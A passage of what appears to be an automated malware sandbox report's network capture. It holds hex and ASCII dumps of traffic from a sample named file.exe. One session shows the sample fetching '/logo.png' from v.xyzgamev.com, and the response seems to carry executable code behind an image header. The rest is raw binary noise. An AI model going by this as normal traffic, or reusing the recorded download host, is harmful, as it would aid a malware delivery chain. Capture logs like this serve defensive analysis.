4e a0 0b cd
                                                          Data Ascii: +9Zv8T{,9n|AWhBIg9uMMBn}K]asNyv"i":&+IV-Q_5N[DkN-pnwO(nuZ#^T q=[3RGA^v)VZWRtuiy.6tGZD2}kV_,hvjrN
                                                          2022-09-11 08:16:26 UTC530INData Raw: 1b a2 d3 a0 19 1e 7f c6 d3 8c 14 4b d3 9e 27 1e a3 9a 44 6f c1 1e 83 1b 86 1e 93 2a d3 ac 15 1e 7d c4 d3 54 cc 4b d3 80 39 1e e9 50 d3 36 8f 1e c9 51 86 1e d9 60 d3 e4 5d 1e b5 0c 59 4a 5e cd 53 8e 60 49 e9 d0 18 15 e7 1e cd 6b b8 1e 52 9e 40 78 78 53 c0 1e 5a 97 12 0b 86 9e 6d d4 d3 fa 43 1e 03 ba d3 1f d6 38 cd a6 e0 6c 16 26 9f 1e 7f c6 fc af 18 4b d3 92 2b 1e b7 8e 52 75 cd 1e fb 63 06 b4 eb f8 53 14 ad 1e 2b 92 d3 ca 52 4b d3 de 67 1e 63 da d3 b0 09 1e 4f af fe 1e 8b 32 d3 9f 5a 16 50 e9 27 99 81 4b d3 f0 49 2b 02 8e d3 7c c5 1f 02 1b 86 9e c8 f1 53 60 d9 1e b2 0b d3 b9 57 e1 0f ea 5d 64 d1 02 b9 1e fb 42 d3 c0 4b 58 d3 6d 54 9c aa 11 d3 50 e9 1f 9c 20 23 9e 9e 27 d3 1b 08 14 07 ea 30 08 26 9e ae 17 d3 7e c7 1e 56 42 de ca 27 4c b7 28 50 bd a4 3d ef
                                                          Data Ascii: K'Do*}TK9P6Q`]YJ^S`IkR@xxSZmC8l&K+RucS+RKgcO2ZP'KI+|S`W]dBKXmTP #'0&~VB'L(P=
                                                          2022-09-11 08:16:26 UTC534INData Raw: 9e 51 be 74 ce 38 f5 88 55 7e f6 51 a1 20 40 cb 86 57 e7 31 a1 7f 16 ae 42 86 6b bf b2 6a ab d5 10 0e f0 8b 72 6f a2 20 9d 68 52 da fc 77 93 8c b9 b4 d7 7a 28 96 d1 ee 7f 31 c5 09 e0 4b a0 7d b5 43 8e ad a3 ce c0 6c c4 c1 0d 2b d7 08 9b 63 b0 fa 8f 80 18 b6 85 c2 ce 52 bf e8 a7 48 c1 7f 8d 60 a0 7b af c7 33 57 a3 62 83 58 d5 76 9b 4a 6e a2 48 87 02 64 5d 75 8b 73 9f b1 3d 6a 2b e5 eb 50 a6 6e a2 19 d5 3c 89 e3 4e 06 37 f9 f4 55 cc 1d a0 7e cb 13 b7 6b 80 46 86 49 aa 6f a3 12 5b 55 6f 7c 83 1d 95 fd 21 9d 44 0a 1d f1 9d 50 ed 60 92 1f 8b 67 d5 18 a7 a0 69 3d 83 74 4e 9e b0 61 9b 51 9c 56 4f 32 3f 4e c3 6a e0 2d e4 28 12 b2 aa 00 a9 b3 7f 3a 81 b8 43 0e a3 0d 57 99 72 9f 1d dc 98 d9 06 8a e2 20 ad 11 78 39 91 62 ab 7b bf 6d ba d1 ee 8e c3 6b 46 84 c5 63 22
                                                          Data Ascii: Qt8U~Q @W1Bkjro hRwz(1K}Cl+cRH`{3WbXvJnHd]us=j+Pn<N7U~kFIo[Uo|!DP`gi=tNaQVO2?Nj-(:CWr x9b{mkFc"
                                                          2022-09-11 08:16:26 UTC535INData Raw: f7 16 72 ca d3 20 98 1c 95 ae 52 5f ef 16 d2 1e cc 4c 9f 1c 9d a6 52 57 e7 16 d2 1e eb 52 a6 1c e5 de 52 4b f3 08 c4 1f d2 1e e8 91 66 1c e1 5a d1 20 93 16 d2 1e e9 51 d1 d2 51 d2 52 3b 8b 16 d1 1d d2 1c f1 ca 52 3d a9 4e db 1f d3 3a 82 1c f9 c2 52 0b 6c bd db 1f d3 39 81 1c c1 fa 52 03 b3 16 72 ca d3 38 80 1c c9 f2 52 77 4f 90 dc 1f 72 ca d3 3f 87 1c d5 6e d1 1c af 16 d2 1e cc 55 86 1c dd e6 52 17 a7 16 d2 1e f0 89 66 1c 25 1e 52 ef 5f 16 d2 1e f1 49 d1 32 75 16 52 e7 57 16 d2 1e fe 46 d1 f8 9a 33 52 ff 4f 16 d2 1e ff 47 d1 f0 cb 9f 08 58 47 16 d2 1e 73 c1 79 3e 52 cf 7f 16 72 ca d3 d1 e9 9a 0b 36 52 c7 7f 1e 5a 97 cd bb 68 1c 15 2e 52 d7 6e 57 13 96 1b 63 66 1c 11 aa d2 d3 6b 1e 5a 97 1a a3 d1 32 2d ce d7 d2 6f 1c 58 97 19 a0 d1 18 8d 48 2c d9 27 de d1
                                                          Data Ascii: r R_LRWRRKfZ QQR;R=N:Rl9Rr8RwOr?nURf%R_I2uRWF3ROGXGsy>Rr6RZh.RnWcfkZ2-oXH,'
                                                          2022-09-11 08:16:26 UTC539INData Raw: 8f 59 ae 61 ae 79 bb 01 81 4c db 10 e3 7d 9d 69 af 64 4e 89 9b 50 b0 6a ba 77 43 f9 bd 0a da 18 d5 fa 31 e5 2e 17 da 29 b0 53 c8 1f a6 41 97 63 9e 47 b4 33 f1 63 a5 70 df ce 0e 11 dc 23 a5 13 ea 7b aa 42 f7 5b 86 14 dc 2f b0 3d 55 98 eb 46 a8 65 a1 68 b0 17 d7 04 34 ec d1 1c 87 4c c7 69 b5 7c f5 39 c1 17 ce 0c cf 31 4c c6 5c 93 e0 7e f2 23 bb 51 a2 6f a6 72 be 03 91 5f 5c 94 56 9b f5 58 ab 77 bb 06 c2 48 92 79 a4 6a a0 7d 01 fd a6 57 da 68 55 8f f3 56 da 97 50 63 57 93 ec 48 ab 41 93 79 ab c7 02 47 8e 65 ad 62 e8 47 d6 12 a1 1b c7 39 85 7b a3 6b a0 7d b2 4c 98 67 a6 eb 51 87 5c 9f 52 28 99 7b a2 63 fa 5c a8 79 4a 91 53 9e eb 3a e9 52 aa 76 da 16 f2 7e bc 07 ee 39 9b 66 af 64 b6 52 82 03 d4 6d b6 61 ac 7d 81 7e e7 3c b8 76 96 7e 94 45 a2 d3 12 61 bd 5e e7
                                                          Data Ascii: YayL}idNPjwC1.)SAcG3cp#{B[/=UFeh4Li|91L\~#Qor_\VXwHyj}WhUVPcWHAyGebG9{k}LgQ\R({c\yJS:Rv~9fdRma}~<v~Ea^
                                                          2022-09-11 08:16:26 UTC541INData Raw: 51 ea d6 1a d6 47 d8 38 a7 62 07 0e 6e 6f d6 1b e8 95 17 4e 33 da 32 8e d6 19 60 de 27 9a d7 62 fc c9 7e 30 a4 1b d7 1b c3 5a 83 03 0e da d6 1b 6a 31 64 4f cb c6 17 ba 07 1a f3 68 01 a4 ea a9 17 1b d6 ec 76 8d 1e d3 17 1b d6 c9 91 4f 17 de a3 da 17 aa d7 92 07 82 1e 62 16 da a7 33 fe 6a 94 03 fd 3e f3 8a f7 da e7 5a d7 01 fc 5a 53 95 1c da d6 1b 66 1b 17 6a 6a a2 a2 d3 6f 1b 95 03 0c a4 29 da d6 1b fc 81 17 bc 5d f6 17 1b d6 8b f6 da e7 9a 17 1b d6 30 1b 3c 17 3e 43 da d6 1b 5b 26 17 0e 82 9b 17 6a fb 36 a7 e3 1e 5a d3 7b 72 da 37 8a d7 40 d3 04 83 ce 17 5a a2 2f d7 b6 4b 5a 33 4e 17 1b d6 d5 79 dc 00 09 04 da d6 1b 7e 03 17 aa d7 da d6 1b 07 d4 db 08 a7 ba c7 da 87 3a d7 30 c9 6e 97 8e f3 da d6 1b f2 8f 17 86 40 d1 17 1b d6 e8 95 da a7 a4 6c 6f 12 ae d6
                                                          Data Ascii: QG8bnoN32`'b~0Zj1dOhvOb3j>ZZSfjjo)]0<>C[&j6Z{r7@Z/KZ3Ny~:0n@lo
                                                          2022-09-11 08:16:26 UTC545INData Raw: 5b 16 3a 57 02 6f 24 e8 a6 eb aa 8e 4a 6f 26 e8 fe ed fa ef be f6 22 ee 25 87 c9 ef 96 5b 22 ef 52 1a 24 74 f7 26 a6 2e 88 81 22 ee 25 06 48 ef f2 ba 22 ee 25 11 8a bf 22 07 4f ef 22 6a 24 d7 99 eb c6 5a 30 a8 a2 aa e7 e9 5f 11 26 13 5c 69 2c e0 25 79 f9 25 a6 ee a3 ef 63 2a 25 db 5a 24 a6 f2 bf ef 23 e8 fe 87 90 ef 0e 46 22 ee 25 8d c3 ef 1e d3 22 ef 52 1a 24 8a 14 3b a6 a6 e8 68 23 ef 24 4a d5 3a a6 d6 9b 81 79 5e 25 eb a5 ef 4e 06 2c e0 25 e2 ac ef ae 66 4e 43 02 cf 66 1c 84 3f a6 00 dd ba 65 e8 e7 ab 12 1e 67 ab 27 eb c6 0b 66 f5 6c 3e a6 ab 64 c8 c7 ab bc b4 a3 aa 97 9a 6f a3 67 f7 6d 3d aa 66 9b 96 65 a9 67 5b c0 3c a6 3c a1 fa 65 a9 67 56 5a a8 cd c2 65 28 a6 eb 66 f6 62 33 a6 12 1f a8 05 c7 6a ab 54 58 67 ab 77 7b fe 32 a6 ca 4e 79 fc 6b 33 3e 62
                                                          Data Ascii: [:Wo$Jo&"%["R$t&."%H"%"O"j$Z0_&\i,%y%c*%Z$#F"%"R$;h#$J:y^%N,%fNCf?eg'fl>dogm=feg[<<egVZe(fb3jTXgw{2Nyk3>b
                                                          2022-09-11 08:16:26 UTC546INData Raw: cf 1a b6 75 6d 9e f2 bf 17 1b d6 c8 c0 ae a6 3c dd f6 17 1b d6 db a6 da e3 9e 17 aa 26 5b d7 00 0b ad a6 3e 43 da d7 43 8e 1a f0 f6 9c 80 0d da c7 7a d7 02 61 0a 99 f1 bd 1a d6 1a 06 fb 97 fe 83 da 1e a2 d6 4a 48 55 4d c0 17 1b d6 5b 26 da 71 0c a7 da d6 1b c9 b4 17 aa d7 da d6 1b 6d d6 a5 1f 26 9a d7 b5 af 0d 71 7c d6 e9 c5 fa d7 4a 5f b3 a6 9e e3 da 22 9e d6 a5 d8 da ab 93 57 6f d6 1b 3d 00 e7 da 87 fa 17 1b d6 47 53 03 05 2d 82 53 de 2a d7 1e 67 de 27 9a d7 7d e0 e0 7c 6b 97 6a 95 48 f7 1a 69 0f 3c 5a 56 c8 24 ca d7 90 6d 5a cf f2 55 c8 07 b1 7d 6b 0d f0 97 2a d7 58 17 68 67 1a c8 d9 0b 17 1a da d7 6a d7 46 a8 94 4a 5f 12 da 97 2a d7 e7 f4 ff 9c 32 3f da 37 8a d7 87 95 06 14 9a 6e 23 d7 31 1c 7a 07 4a d6 1a d6 e1 c8 d6 fe 6b 13 6e 17 1b d6 d8 a5 da 6b
                                                          Data Ascii: um<&[>CCzaJHUM[&qm&q|J_"Wo=GS-S*g'}|kjHi<ZV$mZU}k*XhgjFJ_*2?7n#1zJknk
                                                          2022-09-11 08:16:26 UTC550INData Raw: b7 ad 72 68 f1 01 aa 5a d6 0d f1 5a d7 89 74 5a 97 3f b2 1b 56 ea d7 10 05 02 18 95 78 85 de a3 d7 64 70 03 90 5d 71 7d d6 c3 be da f1 ac 07 58 d4 1b 19 64 17 ce b3 da 67 2f 52 1a 77 8a 97 4a 96 7d a1 1b d6 f0 e5 02 17 46 3b da d6 1b d5 c3 4c 1d 93 a9 17 1b d6 53 42 c6 dd d0 17 1b d6 a4 ff 21 8a cc 41 da 77 ca d7 ab 87 bb c7 5f 72 a4 09 ca d7 b4 9f bc f5 78 d6 8b fe a3 d7 60 4a fd b6 fb 52 1e d6 34 49 da 71 7c d7 da d6 1b 3e 43 17 be c3 da d6 1b bd 8c eb da 4b 36 17 1b d6 d1 f5 81 c3 0c 16 db d6 1b 5d 7a fe d9 d6 1b 94 7b 6a 35 36 5b b1 6c d6 1b b7 8a 80 4d 71 fc 17 1b d6 47 3a da e3 9e 17 1b d6 c0 37 e0 17 32 4f da e7 5a d7 b6 4b 5a 6d c8 7f da 47 fa d7 5d 61 eb dd d0 17 5f e3 1b 54 29 17 ee 93 da d6 1b b8 86 83 cd b6 bb 17 1b d6 53 2e da 13 6e 17 1b d6
                                                          Data Ascii: rhZZtZ?Vxdp]q}Xdg/RwJ}F;LSB!Aw_rx`JR4Iq|>CK6]z{j56[lMqG:72OZKZmG]a_T)S.n
                                                          2022-09-11 08:16:26 UTC552INData Raw: 02 ae fc 20 37 8a 30 71 48 08 3e 12 47 ca e4 1c 31 69 9f 32 c0 89 a3 8a c7 8a b1 ff a4 32 9f 0b 47 8b b9 7e 3a 9e c5 4b 67 8a a7 f3 3d 69 81 6c 67 88 44 8b 18 4f 5d 30 9e 6f 05 ce 67 4a 47 73 25 12 c7 61 cf 8a cb 16 2a 94 d8 97 46 23 8e 0b c7 06 e6 b3 d2 8a 22 8b c2 e3 cf 8a 9c f0 66 2f 92 6c b7 6c 9b b6 47 ac c3 cb e4 2a 6b a3 a4 6c 6f 42 47 e0 7d fa 64 69 7f 52 45 e4 cb 8a 9c c7 f0 cb ad e0 ea 87 07 8a 0e 01 85 97 c9 f9 45 89 46 b6 be 4f 45 08 c6 8a 46 64 f9 fc 62 69 17 ba c6 7b 57 8a 2c e2 c4 0a c6 25 a1 85 63 69 aa af 3c 5d d3 9a 47 2f 2b c0 c5 23 0f 8a 1a b2 a6 0f 66 4a 47 1f 18 40 f7 ba de 0b 76 23 47 47 41 c2 c0 5e 77 8a 67 ca c7 eb c7 83 d3 db 69 69 76 74 08 21 0d 8b f3 7e 56 b8 a4 97 88 5b 59 17 c7 b9 77 69 d1 7c c7 0b c2 16 76 23 47 63 7a 5d 7a
                                                          Data Ascii: 70qH>G1i22G~:Kg=ilgDO]0ogJGs%a*F#"f/llG*kloBG}diREEFOEFdbi{W,%ci<]G/+#fJG@v#GGA^wgiivt!~V[Ywi|v#Gcz]z
                                                          2022-09-11 08:16:26 UTC556INData Raw: ab 1e 1f a1 34 f3 a4 48 2f 7f c2 b2 87 b2 e2 3f 1f 87 02 cc 11 dc 21 b2 78 0d ee db 38 2d 61 bc 71 4c 81 5c 3f c4 a1 6c b1 7c c1 0c d1 b2 09 2c e1 3c f1 cc 00 dd bf c5 20 ed 30 fd 40 8d 50 32 08 ad 60 bd 70 4d 80 5d 3f c5 a0 6d b0 7d c0 0d d0 b2 08 2d e0 3d f0 c5 97 5f a6 6e af 62 f1 34 0f d2 1f e2 8f ca 3f f2 4f 82 5f 92 6f 02 07 b2 7f 42 8f 52 9f 62 0f ca bf 72 cf 02 df 12 ef 82 07 32 ff c2 0e d3 1e e3 8f cb 3e f3 4e 83 5e 93 6e 02 06 b3 7e 43 8e 53 9e 63 0f cb be 73 ce 03 de 13 ee 82 06 33 fe c3 0d d0 1d e0 8f c8 3d f0 4d 80 5d 90 6d 02 05 b0 7d 40 8d 50 9d 60 0f c8 bd 70 cd 00 dd 10 ed 82 05 30 fd c0 0c d1 1c e1 8f c9 3c f1 4c 81 5c 91 6c 02 04 b1 7c 41 8c 51 9c 61 0f c9 bc 71 cc 01 dc 11 ec d7 02 be 8b d2 33 66 ff 3e cb 12 b3 26 9a cf 74 c1 9f f9 2c
                                                          Data Ascii: 4H/?!x8-aqL\?l|,< 0@P2`pM]?m}-=_nb4?O_oBRbr2>N^n~CScs3=M]m}@P`p0<L\l|AQaq3f>&t,
                                                          2022-09-11 08:16:26 UTC558INData Raw: ef 22 1f 92 e7 32 ff a3 d9 70 a2 72 a4 b1 67 4f d5 45 fd 19 f6 68 f5 3c a1 40 3d ba e4 19 17 f8 6d b2 b6 e3 ff c4 b1 d2 69 27 ea a5 6a c6 c6 33 fc ca 4f fe 3b b0 e6 ba 8f 42 87 4a 0f fa 9f 5a 97 62 af 6a a7 c2 17 72 07 cb 1e d3 16 db 0e 4a 2e f3 3e fb 36 83 4e c3 ef 8b 56 9b 6e a3 66 ab 1e 0a 7e 43 8e 20 c1 47 a6 73 17 c3 b6 7b ce 03 de 13 d6 b2 0e 23 ee 2b e6 3b f6 c3 a7 c0 05 c8 1d d0 2d e0 25 42 0d f0 3d f8 35 88 45 90 f7 c0 55 98 6d a0 7d b0 75 12 0d 40 8d 48 85 58 95 60 07 c0 a5 68 bd 70 cd 00 c5 a2 0d 10 dd 18 d5 28 e5 30 57 c0 f5 38 0d c1 1c d1 14 72 0c e1 2c e9 24 f9 34 81 e7 c1 44 89 5c 91 6c a1 64 02 0c b1 7c b9 74 49 84 51 37 c1 94 59 ac 61 bc 71 b4 d2 0c 01 cc 09 c4 19 d4 21 47 c1 e4 29 fc 31 0c c6 03 62 0b d6 1b de 13 ee 23 f6 97 c6 33 fe 4b
                                                          Data Ascii: "2prgOEh<@=mi'j3O;BJZbjrJ.>6NVnf~C Gs{#+;-%B=5EUm}u@HX`hp(0W8r,$4D\ld|tIQ7Yaq!G)1b#3K


                                                          Session ID:       1
                                                          Source IP:        192.168.2.3
                                                          Source Port:      49725
                                                          Destination IP:   104.21.40.196
                                                          Destination Port: 443
                                                          Process:          C:\Users\user\Desktop\file.exe

                                                          Timestamp                 kBytes transferred  Direction  Data
                                                          2022-09-11 08:16:26 UTC   558                 OUT        GET /logo.png HTTP/1.1
                                                                                                                   Connection: Keep-Alive
                                                                                                                   Accept: */*
                                                                                                                   User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                   Host: v.xyzgamev.com
                                                          2022-09-11 08:16:26 UTC   558                 IN         HTTP/1.1 200 OK
                                                                                                                   Date: Sun, 11 Sep 2022 08:16:26 GMT
                                                                                                                   Content-Type: image/png
                                                                                                                   Content-Length: 67409
                                                                                                                   Connection: close
                                                                                                                   Last-Modified: Wed, 24 Aug 2022 05:04:02 GMT
                                                                                                                   ETag: "10751-5e6f59c08b027"
                                                                                                                   Cache-Control: max-age=14400
                                                                                                                   CF-Cache-Status: HIT
                                                                                                                   Age: 6117
                                                                                                                   Accept-Ranges: bytes
                                                                                                                   Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UGYCu1hWQIY2U4l5e6c53hFviDYSt7rU8vWaRzXlKjF0Q8T%2FrWZ03JZeURRJPT9D2iixAxJdSIEeux7DauQ0fgaeZAp0FGx2rkU6LP2XFYqMsqfdZF1Lz6BRaoKYe4%2FpvQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                   NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                   Server: cloudflare
                                                                                                                   CF-RAY: 748ef615fb9bbbd3-FRA
                                                                                                                   alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                          2022-09-11 08:16:26 UTC559INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 10 00 00 00 5c 08 06 00 00 00 a6 e7 ea b6 00 00 17 18 49 44 41 54 78 01 ed 5d 0b 94 1c 55 99 be 3a d3 81 c0 2e 82 c2 2a 82 08 12 10 90 05 92 aa 9a 84 90 d8 5d b7 7b b2 41 e2 41 81 28 b8 bb 0a 08 8a 1b 5c 84 98 05 e5 31 9a ae 9a 09 89 c0 02 0a 41 40 36 e1 81 06 17 10 1f 90 cc 24 01 f4 08 28 c8 43 58 58 7c 10 1e 64 fa 11 92 49 55 75 1e 99 64 7a ef b7 e6 b8 a4 b7 67 e6 bf d5 75 bb aa 87 fb 9d 73 4f e7 31 d3 d3 67 ea d6 57 ff fd ff ef ff 7e 16 07 66 76 ad db 2b ed 54 4c ee 7a a7 71 d7 9f 63 bb c1 65 b6 eb 3b dc f1 7b c4 df e7 8b bf 5f 22 d6 b9 d9 ee 60 56 da f5 8f 4e 77 55 77 67 1a 1a 1a ef 4c a4 7b 36 1f cc 9d ca 79 dc 0d ee b2 5d ff cf e2 b5 2a b3 32 79 6f bb 78 7d 5e 7c ef cd dc f5 ff 29 dd e5 ed cb
                                                          Data Ascii: PNGIHDR\IDATx]U:.*]{AA(\1A@6$(CXX|dIUudzgusO1gW~fv+TLzqce;{_"`VNwUwgL{6y]*2yox}^|)
                                                          2022-09-11 08:16:26 UTC560INData Raw: 93 8f 58 9f 15 44 e2 69 f2 d0 d0 04 92 10 70 27 b8 54 3e 59 19 5c 6f dc 54 4d b1 18 90 ed de 78 78 26 1f fc b7 26 0f 0d 4d 20 09 c8 7b f0 bc b7 4d 2a 51 ea 04 df 40 a2 93 c5 08 b4 f9 c3 43 84 69 68 68 02 89 07 5d 5d d5 77 73 d7 7f 4c 92 3c e6 31 0d 0d 0d 4d 20 82 0c 3e 2f 79 6c b9 86 1e 79 68 68 8c 59 68 02 99 79 ed d0 6e dc f5 d6 48 94 69 57 21 d9 ca 34 34 34 34 81 70 27 38 47 82 3c d6 a1 8c ca 34 34 34 34 81 20 f7 21 d3 24 27 92 95 5f 60 80 86 86 86 26 10 f4 ba c8 68 3d 40 38 0c d0 d0 d0 d0 04 c2 f3 c1 9d 54 02 41 6f 0c 03 34 34 34 34 81 a0 23 96 da 69 9b 71 fd 27 74 d5 a5 75 a0 a1 09 a4 da c5 de 8d c5 54 01 e2 2b 6a f4 41 53 79 6a 54 d3 e9 f6 75 dc e8 28 66 cd 79 c5 ac 75 77 81 1b bf 2d 65 8d 42 c9 b6 2a 85 ac 35 84 57 fc 1d ff 2e fe ff ae a2 6d 7e bd
                                                          Data Ascii: XDip'T>Y\oTMxx&&M {M*Q@Cihh]]wsL<1M >/ylyhhYhynHiW!4444p'8G<4444 !$'_`&h=@8TAo4444#iq'tuT+jASyjTu(fyuw-eB*5W.m~
                                                          2022-09-11 08:16:26 UTC561INData Raw: 8d 33 a8 7b ee 95 74 7a 77 99 72 70 d1 ee 98 51 27 02 f1 bf 4f 22 90 7c 70 f7 98 3f c2 e4 fd 8b ea 32 76 6e f2 91 82 10 76 48 d4 d2 1f 1c 98 36 6d 1f 16 02 d0 7b 40 90 26 75 46 b5 cd 8f b2 11 b0 65 c5 b8 23 c5 f1 63 87 c4 51 e5 67 d5 5e f6 1e 16 02 43 0f b1 f7 8a 23 ce 72 99 ca cc 96 87 c6 1d 31 aa d5 c4 4e b1 23 71 fd 11 92 83 b0 09 5a 54 77 92 40 20 90 a4 4b 44 a3 cf 23 ca 0d 59 51 5c 48 8c 42 9e c5 91 aa 36 2c bc 92 96 44 f5 1e 1c f3 11 88 13 5c 3c cc 85 5c 2a 71 21 ef ad 1a 46 8a 35 80 ea ec a3 c6 15 b3 d6 4f 24 7e e6 6d 6c 04 88 68 62 89 c4 b1 e2 9e 46 fb 59 aa 4f b2 94 78 9f fb 24 a2 9d 11 f3 6b 19 c7 3b 55 86 3c a6 3b c1 fe ac 01 80 7c 32 6e f0 56 d3 09 a4 f6 98 91 b5 7c 62 14 fa 5f 88 56 1a e9 db c2 51 9b f2 b3 10 55 d7 3a b0 cf 25 26 51 5f 1e eb
                                                          Data Ascii: 3{tzwrpQ'O"|p?2vnvH6m{@&uFe#cQg^C#r1N#qZTw@ KD#YQ\HB6,D\<\*q!F5O$~mlhbFYOx$k;U<;|2nV|b_VQU:%&Q_
                                                          2022-09-11 08:16:26 UTC562INData Raw: b8 e9 1c ef 37 12 d2 e1 97 09 03 79 62 01 54 a5 e4 2e dc f9 fe df 0f 43 20 57 d0 ea f1 a6 9a 61 5b f2 2e 68 97 d5 10 c8 15 94 1b 77 fb ca d4 19 8a 75 20 67 12 d5 b0 f3 43 3e d0 be a7 f2 9e c0 10 aa 66 12 08 a1 91 92 6e 60 c5 cd fc 5b 33 cc 0f b1 66 01 73 6f 25 4d 78 1e 22 f4 c8 34 15 e9 05 95 03 a9 dd 94 10 d1 0d 7f e3 9a a7 13 2f d6 0f 98 42 60 68 10 d1 bf f2 33 ec 6d d8 de 97 3a 9d 56 3e 6d bb 45 71 19 f7 0e ca e7 c0 e7 dd c5 81 2c bf f9 10 e2 3e 7c 89 29 42 6e be 77 64 93 85 64 d8 77 3d 0d 3a f8 3f 02 43 21 9a cc 5d 01 30 40 4a 72 86 c6 d2 d9 cb aa 6d 2c 01 80 7a 51 90 da 6f c9 47 31 a7 72 f2 b0 12 e0 f4 e4 83 89 5d b8 eb c3 74 e1 52 65 c8 d4 b6 ee da 27 cd e6 d5 bb 1d 4c ac 7e bc 25 5a f8 95 7c 7e e4 57 44 72 d4 a3 7c 8e cd cb 77 3b a4 f6 e9 4f 95 17
                                                          Data Ascii: 7ybT.C Wa[.hwu gC>fn`[3fso%Mx"4/B`h3m:V>mEq,>|)Bnwddw=:?C!]0@Jrm,zQoG1r]tRe'L~%Z|~WDr|w;O
                                                          2022-09-11 08:16:26 UTC564INData Raw: 6a 9a 44 b0 7b 8b 65 a1 29 d0 ce 0f 1c ca 14 00 21 1c 21 ac 54 b4 8c 7b 1b a9 cd 03 d5 07 d8 1e 68 f5 8f 29 f2 78 00 43 a7 1a 6e 70 73 fd f9 ef 24 02 01 30 8f 05 89 d2 38 22 0f ba 6f 48 88 9a 39 66 ca 66 f2 c1 40 42 8e 2c 9b 60 85 a7 da 76 11 2e 64 45 6e 5d dd e4 0b b9 10 3f 37 42 93 9f ab 9b 4a 20 bd a9 ef 10 c6 66 92 81 41 52 2a a3 60 e4 5b 50 12 8e 9d 40 6a 12 ee c8 a7 35 71 cf fd be 90 35 3f c2 54 03 c2 2c 54 56 70 03 c7 73 5c 81 fd bf b7 04 19 75 d6 44 94 b2 1d 27 29 0e 2d 51 3e 5b 8b 11 13 4c 01 44 27 ee 49 22 09 da af 92 38 f0 fe 98 f4 af 46 4c 58 b1 60 2b a1 60 3f 55 60 54 04 55 75 92 08 04 78 79 e6 84 dd f0 30 41 45 44 2d 79 98 37 10 12 a6 d1 13 09 ca a5 b6 eb bd d6 ac 88 03 ea 43 94 7e 59 93 51 33 08 79 11 ca aa 51 db ce 95 b2 e6 95 aa 1b a5 44
                                                          Data Ascii: jD{e)!!T{h)xCnps$08"oH9ff@B,`v.dEn]?7BJ fAR*`[P@j5q5?T,TVps\uD')-Q>[LD'I"8FLX`+`?U`TUuxy0AED-y7C~YQ3yQD
                                                          2022-09-11 08:16:26 UTC565INData Raw: a3 47 e6 86 28 15 bb 46 e7 47 e6 45 e4 46 e7 09 a8 47 e6 62 05 f3 94 44 e5 47 e6 62 05 fb 9c 44 e5 47 e6 62 05 f9 9e 44 e5 47 e6 bb 3b 0a 0b c4 e4 47 e6 e9 00 00 00 00 00 00 00 50 15 45 00 4c 4d 04 05 80 de 5e 63 63 00 00 00 00 00 00 00 e0 e0 02 23 2a 0a 09 08 00 70 70 00 00 70 70 00 00 00 00 00 a4 b3 17 00 00 10 10 00 00 80 80 00 00 00 00 10 10 10 10 00 00 10 10 00 04 04 00 00 00 00 00 00 04 04 00 00 00 00 00 00 00 00 01 01 00 10 10 00 bf a0 1e 01 02 02 00 00 00 00 10 10 00 10 10 00 00 00 10 10 00 10 10 00 00 00 00 00 10 10 00 00 80 1a 9a 00 62 62 00 00 14 81 95 00 28 28 00 00 00 c0 c0 00 fc da 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f0 00 a0 a7 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: G(FGEFGbDGbDGbDG;GPELM^cc#*ppppbb((&
                                                          2022-09-11 08:16:26 UTC566INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          2022-09-11 08:16:26 UTC568INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii:
